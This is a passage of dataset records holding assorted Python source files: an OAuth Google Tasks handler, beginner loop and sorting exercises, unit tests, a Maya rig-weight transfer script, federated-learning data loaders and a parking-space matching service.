http=decorator.http())\n result = 
service.tasks().list(tasklist='@default').execute()\n tasks = result.get('items',[])\n logging.info(tasks)\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, {'tasks':tasks}))\n else:\n url = decorator.authorize_url()\n logging.info(url)\n path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n self.response.out.write(template.render(path, {'url': url}))\n \nclass TasksHandler(webapp.RequestHandler):\n \n @decorator.oauth_required\n def get(self):\n if decorator.has_credentials():\n service = build('tasks', 'v1', http=decorator.http())\n result = service.tasks().list(tasklist='@default').execute()\n tasks = result.get('items',[])\n tasks = [Task(t) for t in tasks]\n self.response.out.write(simplejson.dumps([t.__dict__() for t in tasks]))\n \n","sub_path":"main_handler.py","file_name":"main_handler.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"138611205","text":"\"\"\"an example of a while loop statement.\"\"\"\n\ncounter: int = 0\n\"\"\"prepare a variable, and make it zero so it can count up\"\"\"\nmaximum: int = int(input(\"Count up to, but not including what?\"))\n\nwhile counter < 10:\n counter_squared: int = counter ** 2\n print(\"The square of \" + str(counter) + \" is \" + str(counter_squared))\n counter = counter + 1\n\"\"\"while counter is less than ten, print the number but then add one. then if that number is less than 10 again, add another until it is not less than 10. \"\"\"\n\n\nprint(\"Done!\")","sub_path":"lessons/while-loop.py","file_name":"while-loop.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582143467","text":"def selectionSort(arr):\n for i in range(0, len(arr)-1):\n for j in range(i+1, len(arr)):\n if (arr[i] > arr[j]):\n tmp = arr[i]\n arr[i] = arr[j]\n arr[j] = tmp\n\narr = [2,8,3,9,8,7,3,7]\nselectionSort(arr)\nprint(arr)\n","sub_path":"Exercise/Array/Ex7.py","file_name":"Ex7.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"113784828","text":"\"\"\"testCreateIDService.py: All the unit test for create_id_service functions.\"\"\"\n__author__ = \"Girard Alexandre\"\n\nimport unittest\n\nfrom app.test.base import BaseTestCase\n\n# Import all functions to be tested\nfrom app.main.service.create_id_service import create_id, create_complete_id, input_is_valid, get_letter_by_total\n\n\n# Tests for function 'input_is_valid'\nclass TestInputValidator(BaseTestCase):\n def test_good_input(self):\n \"\"\" Test for checking good inputs \"\"\"\n good_input1 = \"123456789\"\n good_input2 = \"009999999\"\n self.assertEqual(input_is_valid(good_input1), True)\n self.assertEqual(input_is_valid(good_input2), True)\n\n def test_inputs_bad_length(self):\n \"\"\" Test for checking bad length inputs \"\"\"\n input_too_long = \"1234567890\"\n input_too_short = \"02345678\"\n input_empty = \"\"\n self.assertEqual(input_is_valid(input_too_long), False)\n self.assertEqual(input_is_valid(input_too_short), False)\n self.assertEqual(input_is_valid(input_empty), False)\n\n def test_input_with_other_char_than_numbers(self):\n \"\"\" Test for checking input with bad chars \"\"\"\n input_with_letter = \"12A456789\"\n input_with_special_char = \"1234567+9\"\n self.assertEqual(input_is_valid(input_with_letter), 
False)\n self.assertEqual(input_is_valid(input_with_special_char), False)\n\n def test_input_not_a_string(self):\n \"\"\" Test for checking input with bad var type \"\"\"\n id_integer = 174589632\n id_dictionary = {\"id\": \"123456789\"}\n id_list = [\"123456789\"]\n id_bool = True\n id_null = None\n self.assertEqual(input_is_valid(id_integer), False)\n self.assertEqual(input_is_valid(id_dictionary), False)\n self.assertEqual(input_is_valid(id_list), False)\n self.assertEqual(input_is_valid(id_bool), False)\n self.assertEqual(input_is_valid(id_null), False)\n\n\n# Tests for function 'create_complete_id' -- it can only have good inputs (verified before)\nclass TestCompleteIDCreator(BaseTestCase):\n def test_good_input(self):\n \"\"\" Test for checking good inputs \"\"\"\n input1 = \"123456789\"\n input2 = \"009999999\"\n self.assertEqual(create_complete_id(input1), \"J123456789\")\n self.assertEqual(create_complete_id(input2), \"Z009999999\")\n\n\n# Tests for function 'get_letter_by_total'\nclass TestGetLetterByTotal(BaseTestCase):\n def test_some_totals(self):\n \"\"\" Test with some totals \"\"\"\n total1 = 0\n total2 = 4\n total3 = 8\n self.assertEqual(get_letter_by_total(total1), \"Z\")\n self.assertEqual(get_letter_by_total(total2), \"D\")\n self.assertEqual(get_letter_by_total(total3), \"H\")\n\n\n# Tests for function 'create_id'\nclass TestIDCreator(BaseTestCase):\n good_response = {\n 'status': 'successfully finished',\n 'request': None,\n 'result': None\n }\n\n bad_response = {\n 'status': 'successfully finished - but input not valid format (9 numbers expected)',\n 'request': None,\n 'result': None\n }\n\n def test_good_input(self):\n \"\"\" Test for creating with good input \"\"\"\n response = self.good_response\n good_input1 = \"123456789\"\n good_input2 = \"009999999\"\n response[\"request\"] = good_input1\n response[\"result\"] = \"J123456789\"\n self.assertEqual(create_id(good_input1), response)\n response[\"request\"] = good_input2\n response[\"result\"] = \"Z009999999\"\n self.assertEqual(create_id(good_input2), response)\n\n def test_bad_input(self):\n \"\"\" Test for checking bad input - not good format \"\"\"\n response = self.bad_response\n bad_input1 = \"23456789\"\n bad_input2 = \"A02999999\"\n response[\"result\"] = \"null\"\n response[\"request\"] = bad_input1\n self.assertEqual(create_id(bad_input1), response)\n response[\"request\"] = bad_input2\n self.assertEqual(create_id(bad_input2), response)\n","sub_path":"app/test/testCreateIDService.py","file_name":"testCreateIDService.py","file_ext":"py","file_size_in_byte":3987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"375950205","text":"# coding: utf-8\n#Author: rosa.w\n#Mail: wrx1844@qq.com\n#Computer language: Python.3.2.2\n#scriptName : SimpleRigToMocap.py\n#----------------------------------------------\n\n# Apr 06 | first write.\n\n#----------------------------------------------\n\nimport maya.cmds as mc\nimport maya.mel as mel\nimport os, sys\n\n\nclass srtm():\n\n def __init__(self):\n\n # upbody need edit weights.\n self.LUparmHoldJnt = 'L_uparm_sub01_jnt'\n self.LUparmAimJnt = ['L_uparm_sub02_jnt' , 'L_uparm_sub03_jnt' , 'L_uparm_sub04_jnt']\n\n self.LDnarmHoldJnt = 'L_lowarm_sub01_jnt'\n self.LDnarmAimJnt = ['L_lowarm_sub02_jnt' , 'L_lowarm_sub03_jnt' , 'L_lowarm_sub04_jnt']\n\n self.RUparmHoldJnt = 'R_uparm_sub01_jnt'\n self.RUparmAimJnt = ['R_uparm_sub02_jnt' , 'R_uparm_sub03_jnt' , 'R_uparm_sub04_jnt']\n\n self.RDnarmHoldJnt = 
'R_lowarm_sub01_jnt'\n        self.RDnarmAimJnt = ['R_lowarm_sub02_jnt' , 'R_lowarm_sub03_jnt' , 'R_lowarm_sub04_jnt']\n\n        # lower-body joints whose weights need editing.\n        self.LUplegHoldJnt = 'L_upleg_sub01_jnt'\n        self.LUplegAimJnt = ['L_upleg_sub02_jnt' , 'L_upleg_sub03_jnt' , 'L_upleg_sub04_jnt']\n\n        self.LDnlegHoldJnt = 'L_lowleg_sub01_jnt'\n        self.LDnlegAimJnt = ['L_lowleg_sub02_jnt' , 'L_lowleg_sub03_jnt' , 'L_lowleg_sub04_jnt']\n\n        self.RUplegHoldJnt = 'R_upleg_sub01_jnt'\n        self.RUplegAimJnt = ['R_upleg_sub02_jnt' , 'R_upleg_sub03_jnt' , 'R_upleg_sub04_jnt']\n\n        self.RDnlegHoldJnt = 'R_lowleg_sub01_jnt'\n        self.RDnlegAimJnt = ['R_lowleg_sub02_jnt' , 'R_lowleg_sub03_jnt' , 'R_lowleg_sub04_jnt']\n\n        # spine joints whose weights need editing.\n        self.hipJnt = 'hip_jnt'\n        self.chestJnt = 'chest_jnt'\n        self.spineSkinGrp = 'clawgeoskinjnt_grp'\n        self.mohipJnt = 'Hips'\n        self.mochestJnt = 'Chest'\n\n    def selectInfluencedPoints(self , queryJoint , mesh):\n        # get the points influenced by the given joint.\n        affectedPoints=[]\n        skinNode = self.searchSkinCluster(mesh)\n        NodeSet = mc.listConnections( skinNode ,type='objectSet')\n        pointList = mc.filterExpand(NodeSet , sm=(36,28,31,46))\n\n        for c in pointList:\n            value = mc.skinPercent(skinNode , c , t=queryJoint , q=True , v=True)\n            if value > 0.0:\n                affectedPoints.append(c)\n\n        return affectedPoints\n\n\n    def searchSkinCluster(self , mesh):\n        # get the skinCluster attached to the mesh\n        skinNode = mel.eval(\"findRelatedSkinCluster\" +\"(\\\"\"+ mesh +\"\\\")\")\n        return skinNode\n\n\n    def SetSkinWeight(self , mesh , holdJnt , aimJnt=[]):\n\n        skinNode = self.searchSkinCluster(mesh)\n        skinInfulence = mc.skinCluster(skinNode , query=True,inf=True)\n\n        if holdJnt in skinInfulence:\n            for x in aimJnt:\n                if x in skinInfulence:\n                    mc.setAttr(x+'.liw' , 0)\n                    mc.select(mesh)\n                    mc.skinPercent( skinNode ,tv=[(holdJnt, 1.0)])\n                    mc.setAttr(x+'.liw' , 1)\n                    mc.select(cl=1)\n\n\n    def CopyAndRename(self , obj , name):\n        duplicate = mc.duplicate(obj)\n        mc.select(duplicate[0],hi=1)\n        sel = mc.ls(sl=1,fl=True)\n        prefix = name\n\n        newObj=[]\n        for i in range(len(sel)):\n            n =len(sel)- i-1\n            temp = (sel[n].split('|'))[-1]\n            newName = prefix+temp\n            mc.rename(sel[n],newName)\n            newObj.append(newName)\n\n        root = mc.rename(newObj[-1],'%s%s'%(name,obj))\n        newObj.remove(newObj[-1])\n        newObj.append(root)\n        newObj.reverse()\n        return newObj\n\n\n    def GenerateMocapMeshAndCopyOrgWeight(self ):\n        orgMesh = mc.ls(sl=1)\n\n        # create name\n        name=''\n        while name == '':\n            result = mc.promptDialog(title='Character Name',message='Enter Name:',button=['OK', 'Cancel'],defaultButton='OK',cancelButton='Cancel',dismissString='Cancel')\n            if result == 'OK':\n                name = mc.promptDialog(query=True, text=True)+'_'\n\n        # create mocap group.\n        # get mocap skin joints.\n\n        mocapMeshGrp = mc.createNode('transform' , name=name+'mocap_grp')\n        mocapInfList = self.CopyAndRename(self.mohipJnt , name)\n        mc.parent(mocapInfList[0] , mocapMeshGrp)\n\n        # get waist skin joints.\n        spineSkinJnt = mc.ls( self.spineSkinGrp , dag=1 , type='joint')\n        waistJnt = [self.hipJnt]\n        for x in spineSkinJnt:\n            if 'waist' in x:\n                waistJnt.append(x)\n        waistJnt.append(self.chestJnt)\n\n        #---------------- progress win\n        progressWin = mc.window(title = \"create mocap rig\")\n        mc.columnLayout(adj = True)\n\n        if len(orgMesh)==1:\n            pointsNum=1\n        elif len(orgMesh)>1:\n            pointsNum = len(orgMesh)-1\n\n        progressControl = mc.progressBar(maxValue = pointsNum, width=300)\n        mc.showWindow( progressWin )\n        #---------------- progress win\n\n        for x in orgMesh:\n            # query the progress bar we created (the original queried mc.progressWindow, which was never opened;\n            # note cancellation is only reported for Maya's main progress bar)\n            if mc.progressBar(progressControl, query=True, 
isCancelled=True ):\n                break\n            # get the old mesh's skinCluster / old skin joints.\n            oldskinNode = self.searchSkinCluster(x)\n            oldInfulence = mc.skinCluster(oldskinNode,query=True,inf=True)\n\n            # the new bridge mesh needs the same skin joints as the old mesh.\n            newInfulence = oldInfulence\n            newMesh = mc.duplicate(x, name=str(x)+'_mocapmodel')[0]\n            mc.parent(newMesh , mocapMeshGrp)\n\n            # skin the bridge mesh and copy the skin weights from the old mesh.\n            mc.skinCluster(newInfulence , newMesh , tsb=True)\n            mc.copySkinWeights(x , newMesh , noMirror=True , surfaceAssociation='closestPoint' , influenceAssociation='oneToOne')\n\n            # lock all the joints' skin weights.\n            for j in newInfulence:\n                mc.setAttr(j+'.liw' , 1)\n\n            mc.select(cl=1)\n\n            # edit skin weights for the body twist joints.\n            self.SetSkinWeight( newMesh , self.LUparmHoldJnt , self.LUparmAimJnt)\n            self.SetSkinWeight( newMesh , self.LDnarmHoldJnt , self.LDnarmAimJnt)\n            self.SetSkinWeight( newMesh , self.RUparmHoldJnt , self.RUparmAimJnt)\n            self.SetSkinWeight( newMesh , self.RDnarmHoldJnt , self.RDnarmAimJnt)\n\n            self.SetSkinWeight( newMesh , self.LUplegHoldJnt , self.LUplegAimJnt)\n            self.SetSkinWeight( newMesh , self.LDnlegHoldJnt , self.LDnlegAimJnt)\n            self.SetSkinWeight( newMesh , self.RUplegHoldJnt , self.RUplegAimJnt)\n            self.SetSkinWeight( newMesh , self.RDnlegHoldJnt , self.RDnlegAimJnt)\n\n            # get spine holdJnt / aimJnt\n            spineAimJnt = []\n            spineHoldJnt=[]\n\n            if len(spineSkinJnt) != len(waistJnt):\n                # hold\n                for i in range(0 , len(waistJnt) , 2):\n                    if i!=len(waistJnt)-1:\n                        spineHoldJnt.append(waistJnt[i])\n                # aim\n                for i in range(1 , len(waistJnt) , 2):\n                    spineAimJnt.append(waistJnt[i])\n\n            # edit spine skin weights.\n            for i in range( len(spineHoldJnt) ):\n                self.SetSkinWeight( newMesh , spineHoldJnt[i] , aimJnt=[ spineAimJnt[i] ] )\n\n            # set the final mocap mesh:\n            # skin it with the mocap skin joints and transfer the weights.\n\n            mocapMesh = mc.duplicate(newMesh, name=str(x)+'_mocapMesh')[0]\n            mc.skinCluster(mocapInfList , mocapMesh , tsb=True)\n            mc.copySkinWeights(newMesh , mocapMesh , noMirror=True , surfaceAssociation='closestPoint' , influenceAssociation='closestJoint')\n            mc.delete(newMesh)\n\n            mc.progressBar(progressControl, edit=True, step=1)\n        mc.deleteUI(progressWin)\n\n\n","sub_path":"rosa_Checker/RosaCmds/Tools/rosa_SimpleRigToMocap.py","file_name":"rosa_SimpleRigToMocap.py","file_ext":"py","file_size_in_byte":9512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"568514779","text":"import torch\nimport torchvision\nfrom torchvision import transforms, datasets\nfrom torch.utils.data.dataset import Dataset\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n#                'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nclass_names = ['0', '1', '2', '3', '4',\n               '5', '6', '7', '8', '9']\nglobal_data_name = \"none\"\n\ndef plot_random_figure(train_loader):\n    dataiter = iter(train_loader)\n    images, labels = next(dataiter)\n\n    # create a grid of images\n    img_grid = torchvision.utils.make_grid(images[0])\n\n    # show images & labels\n    matplotlib_imshow(img_grid)\n    print(class_names[labels[0]])\n\n\ndef matplotlib_imshow(img):\n    img = img.mean(dim=0)\n    img = img / 2 + 0.5     # unnormalize\n    npimg = img.numpy()\n    plt.imshow(npimg, cmap=\"Greys\")\n    plt.show()\n\n\ndef load_dataset(data_name):\n\n    if data_name == \"MNIST\":\n        print(\"MNIST\")\n        train_set = torchvision.datasets.MNIST(\n            root='../../data/MNIST',\n            train=True,\n            download=True\n        )\n\n        test_set 
= torchvision.datasets.MNIST(\n root='../../data/MNIST',\n train=False,\n download=True,\n )\n else:\n print(\"FashionMNIST\")\n train_set = torchvision.datasets.FashionMNIST(\n root='../../data/FashionMNIST',\n train=True,\n download=True\n )\n\n test_set = torchvision.datasets.FashionMNIST(\n root='../../data/FashionMNIST',\n train=False,\n download=True,\n )\n\n x_train, y_train = train_set.train_data.numpy().reshape(-1, 1, 28, 28) / 255, np.array(train_set.train_labels)\n x_test, y_test = test_set.test_data.numpy().reshape(-1, 1, 28, 28) / 255, np.array(test_set.test_labels)\n\n return x_train, y_train, x_test, y_test\n\n\ndef split_image_data(data, labels, n_clients=10, classes_per_client=10, shuffle=True, verbose=True, balancedness=None):\n '''\n Splits (data, labels) evenly among 'n_clients s.t. every client holds 'classes_per_client\n different labels\n data : [n_data x shape]\n labels : [n_data (x 1)] from 0 to n_labels\n '''\n\n # constants\n n_data = data.shape[0]\n n_labels = np.max(labels) + 1\n\n # if balancedness >= 1.0:\n data_per_client = [n_data // n_clients] * n_clients\n data_per_client_per_class = [data_per_client[0] // classes_per_client] * n_clients\n # data_per_client = [n_data] * n_clients\n print(data_per_client, data_per_client_per_class)\n\n # else:\n # fracs = balancedness ** np.linspace(0, n_clients - 1, n_clients)\n # fracs /= np.sum(fracs)\n # fracs = 0.1 / n_clients + (1 - 0.1) * fracs\n # data_per_client = [np.floor(frac * n_data).astype('int') for frac in fracs]\n #\n # data_per_client = data_per_client[::-1]\n #\n # data_per_client_per_class = [np.maximum(1, nd // classes_per_client) for nd in data_per_client]\n\n # if sum(data_per_client) > n_data:\n # print(\"Impossible Split\")\n # exit()\n\n # sort for labels\n data_idcs = [[] for i in range(n_labels)]\n for j, label in enumerate(labels):\n data_idcs[label] += [j]\n if shuffle:\n for idcs in data_idcs:\n np.random.shuffle(idcs)\n\n # split data among clients\n clients_split = []\n c = 0\n for i in range(n_clients):\n client_idcs = []\n budget = data_per_client[i]\n c = np.random.randint(n_labels)\n while budget > 0:\n take = min(data_per_client_per_class[i], len(data_idcs[c]), budget)\n\n client_idcs += data_idcs[c][:take]\n data_idcs[c] = data_idcs[c][take:]\n\n budget -= take\n c = (c + 1) % n_labels\n\n clients_split += [(data[client_idcs], labels[client_idcs])]\n\n def print_split(clients_split):\n print(\"Data split:\")\n for i, client in enumerate(clients_split):\n split = np.sum(client[1].reshape(1, -1) == np.arange(n_labels).reshape(-1, 1), axis=1)\n print(\" - Client {}: {}\".format(i, split))\n print()\n\n if verbose:\n print_split(clients_split)\n\n return clients_split\n\n\ndef split_image_data_customize(data, labels, n_clients=10, class_distribution=None, shuffle=True, verbose=True):\n if len(class_distribution) != n_clients:\n print(\"Invalid distribution\")\n exit()\n\n # constants\n n_data = data.shape[0]\n n_labels = np.max(labels) + 1\n\n data_idcs = [[] for i in range(n_labels)]\n for j, label in enumerate(labels):\n data_idcs[label] += [j]\n if shuffle:\n for idcs in data_idcs:\n np.random.shuffle(idcs)\n\n clients_split = []\n c = 0\n for i in range(n_clients):\n client_idcs = []\n\n for c in range(len(class_distribution[i])):\n take = class_distribution[i][c]\n client_idcs += data_idcs[c][:take]\n\n clients_split += [(data[client_idcs], labels[client_idcs])]\n\n def print_split(clients_split):\n print(\"Data split:\")\n for i, client in enumerate(clients_split):\n split = 
np.sum(client[1].reshape(1, -1) == np.arange(n_labels).reshape(-1, 1), axis=1)\n            print(\" - Client {}: {}\".format(i, split))\n        print()\n\n    if verbose:\n        print_split(clients_split)\n\n    return clients_split\n\n\nclass CustomImageDataset(Dataset):\n    '''\n    A custom Dataset class for images\n    inputs : numpy array [n_data x shape]\n    labels : numpy array [n_data (x 1)]\n    '''\n\n    def __init__(self, inputs, labels, transforms=None):\n        assert inputs.shape[0] == labels.shape[0]\n        self.inputs = torch.Tensor(inputs)\n        self.labels = torch.Tensor(labels).long()\n        self.transforms = transforms\n\n    def __getitem__(self, index):\n        img, label = self.inputs[index], self.labels[index]\n\n        if self.transforms is not None:\n            img = self.transforms(img)\n\n        return (img, label)\n\n    def __len__(self):\n        return self.inputs.shape[0]\n\n\ndef get_loader(data_name, transform, batch_size, worker_number, class_per):\n\n    # load_dataset() requires the dataset name, so take it as a parameter here as well\n    x_train, y_train, x_test, y_test = load_dataset(data_name)\n\n    split = split_image_data(x_train, y_train, n_clients=worker_number,\n                             classes_per_client=class_per, verbose=True)\n\n    client_loaders = [torch.utils.data.DataLoader(CustomImageDataset(x, y, transform),\n                                                  batch_size=batch_size, shuffle=True) for x, y in split]\n\n    test_loader = torch.utils.data.DataLoader(CustomImageDataset(x_test, y_test, transform), batch_size=batch_size,\n                                              shuffle=True)\n    plot_random_figure(client_loaders[0])\n    return client_loaders, test_loader\n\n\ndef get_loader_customize(data_name, transform, batch_size, worker_number, class_dist):\n\n    x_train, y_train, x_test, y_test = load_dataset(data_name)\n\n    split = split_image_data_customize(x_train, y_train, n_clients=worker_number,\n                                       class_distribution=class_dist,\n                                       shuffle=True,\n                                       verbose=True)\n\n    client_loaders = [torch.utils.data.DataLoader(CustomImageDataset(x, y, transform),\n                                                  batch_size=batch_size, shuffle=True) for x, y in split]\n\n    test_loader = torch.utils.data.DataLoader(CustomImageDataset(x_test, y_test, transform), batch_size=batch_size,\n                                              shuffle=True)\n    # plot_random_figure(client_loaders[0])\n    return client_loaders, test_loader","sub_path":"src/utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":7624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"313914206","text":"from clay import config\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom tornado.gen import coroutine, Return\n\nfrom ParkingFinder.base.errors import BaseError, NotFound, InvalidEntity, InvalidArguments\nfrom ParkingFinder.base.errors import Timeout\nfrom ParkingFinder.base.with_repeat import with_repeat\nfrom ParkingFinder.repositories import (\n    AvailableParkingSpacePool,\n    MatchedParkingList,\n    ParkingLotRepository,\n    WaitingUserPool,\n)\nfrom ParkingFinder.entities.matched_parking_space import MatchedParkingSpace\nfrom ParkingFinder.services.real_time_location_service import RealTimeLocationService\n\nlogger = config.get_logger('service.user_request')\n\nawaiting_matching_time_out = config.get('matching.matching_timeout')\nawaiting_matching_duration = config.get('matching.matching_duration')\nawaiting_matching_repeat_times = config.get('matching.matching_repeat_count')\nawaiting_action_time_out = config.get('matching.awaiting_action_timeout')\nawaiting_action_duration = config.get('matching.awaiting_action_duration')\nawaiting_action_repeat_times = config.get('matching.awaiting_action_repeat_count')\n\n# available_parking_space now has longitude, latitude, location and plate, so returning 
available_space_list is enough\n# use pop_many instead of read_many\n# insert -> raises an exception; read -> raises NotFoundException; update -> returns # of rows affected; remove -> returns None when removal fails\n\n\nclass NoResultFoundInMatchedSpaceTable(BaseError):\n    error = \"No Result Found In Matched Space Table\"\n\n\nclass CanNotStopForwardingMessage(BaseError):\n    error = \"Can Not Stop Forwarding Message\"\n\n\nclass UserRequestService(object):\n\n    @classmethod\n    @coroutine\n    def request_parking_space(cls, waiting_user):\n        \"\"\"\n        service that handles a user's parking space request\n\n        :param: waiting_user: user entity\n        :raise: Timeout: no space became available within the time limit\n        :raise InvalidArguments: the user terminated further service\n        :raise InvalidEntity: the user passed in is not valid\n        :return: List\n        \"\"\"\n        # branch to handle fetching the list of available spaces\n        logger.info({\n            'message': 'request parking space',\n            'waiting user': waiting_user\n        })\n        space_return = []\n        try:\n            user_info = yield WaitingUserPool.read_one(user_id=waiting_user.user_id)\n            # TODO if the user exists, update the user's geographical location\n            try:\n                space_return = yield cls._loop_checking_space_availability(user_id=waiting_user.user_id)\n            except Timeout:\n                pass\n        except NoResultFound:\n            try:\n                inserted_user = yield WaitingUserPool.insert(waiting_user=waiting_user)\n            except IntegrityError:\n                raise InvalidEntity\n            try:\n                space_return = yield cls._checking_space_availability(waiting_user=waiting_user)\n            except Timeout:\n                pass\n\n        # branch to handle whether the user continues to use the service\n        try:\n            # case where the user continues the service\n\n            user_info = yield WaitingUserPool.read_one(user_id=waiting_user.user_id)\n            if not space_return:\n                raise Timeout\n            raise Return(space_return)\n        except NoResultFound:\n            # case where the user stops the service\n            for space in space_return:\n                yield MatchedParkingList.update(\n                    user_id=waiting_user.user_id,\n                    plate=space.plate,\n                    status='rejected'\n                )\n            raise InvalidArguments\n\n    @classmethod\n    @coroutine\n    def accept_parking_space(cls, user_id, accepted_space_plate):\n        \"\"\"\n        service that handles the case where a user accepts a parking space\n        :param: str user_id:\n        :param: accepted_space_plate: can be one plate or null. 
if it is null, it means the user rejected\n                                          all the spaces we provided\n        :raise: Timeout: the user didn't make a choice within the time limit\n        :raise: InvalidEntity: information among the tables is inconsistent,\n                               possibly an internal error\n        :raise: InvalidArguments: the user terminated the service halfway through\n        :return: ParkingSpace: matched parking space\n        \"\"\"\n\n        try:\n            list_of_matching_space = yield MatchedParkingList.read_many(user_id=user_id)\n            if not list_of_matching_space:\n                raise NoResultFound\n            # loop to update the corresponding status in the table\n            for matched_result in list_of_matching_space:\n                if accepted_space_plate != matched_result.plate:\n                    _status = 'rejected'\n                elif matched_result.is_expired:\n                    _status = 'expired'\n                else:\n                    _status = 'reserved'\n\n                modified_row = yield MatchedParkingList.update(\n                    user_id=user_id,\n                    plate=matched_result.plate,\n                    status=_status\n                )\n                if modified_row == 0:\n                    raise InvalidEntity\n                elif _status == 'expired':\n                    raise Timeout\n\n            removed = yield WaitingUserPool.remove(user_id=user_id)\n            # case where the user is no longer valid, so mark the space as rejected\n            # and do not return the token\n            if not removed:\n                yield MatchedParkingList.update(\n                    user_id=user_id,\n                    plate=accepted_space_plate,\n                    status='rejected'\n                )\n                raise InvalidArguments\n            else:\n                parking_space = yield ParkingLotRepository.read_one(plate=accepted_space_plate)\n                raise Return(parking_space)\n\n        except NoResultFound:\n            raise Timeout\n\n    @classmethod\n    @coroutine\n    def reject_all_parking(cls, waiting_user):\n        \"\"\"\n        service that handles the case where a user rejects all parking spaces;\n        this function will either throw an exception or return a nonempty list\n        :param WaitingUser waiting_user:\n        :raise Timeout: no space can currently be found\n        :raise InvalidArguments: the user terminated further service\n        :raise InvalidEntity: information among the tables is inconsistent,\n                              possibly an internal error\n        :return: list\n        \"\"\"\n\n        try:\n            list_of_matching_space = yield MatchedParkingList.read_many(user_id=waiting_user.user_id)\n            for matched_result in list_of_matching_space:\n                modified_row = yield MatchedParkingList.update(user_id=waiting_user.user_id,\n                                                               plate=matched_result.plate,\n                                                               status='rejected')\n                if modified_row == 0:\n                    raise InvalidEntity\n            # we provide the service first and then terminate if necessary, to avoid inconsistency\n        except NoResultFound:\n            pass\n\n        space_return = []\n        try:\n            space_return = yield cls._checking_space_availability(waiting_user=waiting_user)\n        except Timeout:\n            pass\n\n        try:\n            # case where the user continues using the service\n            user_existed = yield WaitingUserPool.read_one(user_id=waiting_user.user_id)\n            if not space_return:\n                raise Timeout\n            raise Return(space_return)\n        except NoResultFound:\n            # case where the user stops the service\n            for space in space_return:\n                modified_row = yield MatchedParkingList.update(user_id=waiting_user.user_id,\n                                                               plate=space.plate,\n                                                               status='rejected')\n                if modified_row == 0:\n                    raise InvalidEntity\n            raise InvalidArguments\n\n    @classmethod\n    @coroutine\n    def fetching_space_nearby(cls, latitude, longitude, location):\n        \"\"\"\n        fetch the spaces that are near the given location\n        :param latitude:\n        :param longitude:\n        :param location:\n        :raise NoResultFound\n        :return: List\n        \"\"\"\n        # use read_many only, since we don't want to change the status of the spaces in the table\n        list_of_available_space = yield AvailableParkingSpacePool.read_many(\n            latitude=latitude,\n            longitude=longitude,\n            location=location\n        )\n        if not 
list_of_available_space:\n            raise NoResultFound\n        raise Return(list_of_available_space)\n\n    @classmethod\n    @with_repeat(\n        repeat_exceptions=NoResultFoundInMatchedSpaceTable,\n        repeat_times=awaiting_matching_repeat_times,\n        timeout=awaiting_matching_time_out,\n        duration=awaiting_matching_duration,\n    )\n    @coroutine\n    def _loop_checking_space_availability(cls, user_id):\n        \"\"\"\n        *** matched_parking_space_table == pre_reserved_table ***\n        checks whether any spaces are assigned to the user in the\n        matched_parking_space_table; this function never returns an empty\n        list -- it either raises Timeout or returns a list with spaces\n        :param str user_id: this function only accepts users that are\n                            marked as \"active\" in the user waiting pool\n        :raise Timeout\n        :raise InvalidEntity: information among the tables is inconsistent,\n                              possibly an internal error\n        :return: list\n        \"\"\"\n        list_of_matched_space = yield MatchedParkingList.read_many(user_id=user_id)\n        if not list_of_matched_space:\n            logger.info({\n                'message': 'no available parking spaces',\n                'user_id': user_id,\n            })\n\n            raise NoResultFoundInMatchedSpaceTable\n\n        spaces_return = []\n        for matching_space in list_of_matched_space:\n            if matching_space.is_awaiting:\n                try:\n                    space = yield AvailableParkingSpacePool.read_one(plate=matching_space.plate)\n                    spaces_return.append(space)\n                except NoResultFound:\n                    raise InvalidEntity\n        if not spaces_return:\n            logger.info({\n                'message': 'no available parking spaces',\n                'user_id': user_id,\n            })\n            raise NoResultFoundInMatchedSpaceTable\n        else:\n            raise Return(spaces_return)\n\n    @classmethod\n    @coroutine\n    def _checking_space_availability(cls, waiting_user):\n        \"\"\"\n        first checks the available parking space pool; if nothing is\n        available there, calls _loop_checking_space_availability to find a space by looping\n        :param WaitingUser waiting_user: this function only accepts users that are\n                                 marked as \"inactive\" in the user waiting pool,\n                                 and may mark the user as \"active\" along the way\n                                 in order to call\n                                 _loop_checking_space_availability. 
The internal logic enforces consistency.\n        :raise Timeout\n        :raise InvalidEntity: information among the tables is inconsistent,\n                              possibly an internal error\n        :return: list\n        \"\"\"\n        # TODO: the read_many API might change based on how the location value is stored in each entity,\n        # TODO: so the parameters might change accordingly\n        try:\n            location = waiting_user.location\n            list_of_available_space = yield AvailableParkingSpacePool.pop_many(\n                latitude=location.latitude,\n                longitude=location.longitude,\n                location=location.location\n            )\n            if not list_of_available_space:\n                yield WaitingUserPool.update(\n                    user_id=waiting_user.user_id, is_active=True)\n\n                spaces_return = yield cls._loop_checking_space_availability(waiting_user.user_id)\n                raise Return(spaces_return)\n            else:\n\n                spaces_return = list_of_available_space\n                for space_element in list_of_available_space:\n                    # insert the matched result into the pre-reserved table and mark its status as awaiting\n                    modified = yield MatchedParkingList.insert(\n                        MatchedParkingSpace({\n                            'plate': space_element.plate,\n                            'user_id': waiting_user.user_id,\n                            'status': 'awaiting',\n                        })\n                    )\n                raise Return(spaces_return)\n        except IntegrityError:\n            raise InvalidEntity\n\n\n    @classmethod\n    @coroutine\n    def service_terminate(cls, user_id):\n        \"\"\"\n        terminate the user's service as requested\n        :param str user_id:\n        :raise CanNotStopForwardingMessage: either it is too late to terminate the service or\n                                            there is an inconsistency in the table, possibly an internal error\n        :return:\n        \"\"\"\n        removed = yield 